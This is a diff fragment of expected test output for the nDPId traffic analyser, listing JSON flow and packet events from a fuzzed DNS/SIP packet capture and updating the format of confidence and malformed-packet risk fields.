-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":38,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":38,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 01448{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":321,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":867,"pkt_type":2176,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":867,"pkt_l4_len":0,"ts_msec":1120470233794,"pkt":"ADBUADRWAODtAW69CIBFAANVaMMAAIARFRXAqAEC1PIhIxPEE8QDQYjhSU5WSVRFIHNpcDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQL1MuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjo1MDYwO2JyYW5jaD16OWhHNGJLbnA4NTIxMzY5NC00MzBhYTFkZTGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":321,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2176}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1120470233796,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470233796,"pkt":"ADBUADRWAODtAW69CABFAABIasQAAIARTI3AqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 01449{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":323,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":867,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":867,"pkt_l4_len":0,"ts_msec":1120470234292,"pkt":"ADBUADRWAOCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":323,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1120470234792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470234792,"pkt":"ADBUADRWAODtAW69CABFAABIasYAAIARTIvAqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470236795,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1120470236795,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470236795,"pkt":"ADBUADRWAODtAW69CABFAABIaskAAIARTIjAqAECqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1120470238798,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470238798,"pkt":"ADBUADRWAODtAW69CABFAABIasoAAIARTIfAqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzDXAJY0liZXJjaXR5AmRrAAAhAAE="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":331,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470233796,"flow_last_seen":1120470238798,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470238798,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.s?p.cibercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00774{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":331,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470233796,"flow_last_seen":1120470238798,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470238798,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.s?p.cibercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470242804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470066293,"flow_last_seen":1120470075303,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120469572981,"flow_last_seen":1120470235521,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":7862,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120469572981,"flow_last_seen":1120470235521,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":7862,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1120470250805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470250805,"pkt":"ADAlcwBWAODtAW69CABFAABEaswAAIARTInAqAFuwKgBAQrNADUAMLv0aP0AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470250805,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470250807,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1120470250807,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470250807,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cs0AR55waP2AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyhGFycGEAAAwAAcAMAAwAJXMAJxAAawlsb2NhbGhvc3QA"}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470250807,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470250807,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470250906,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
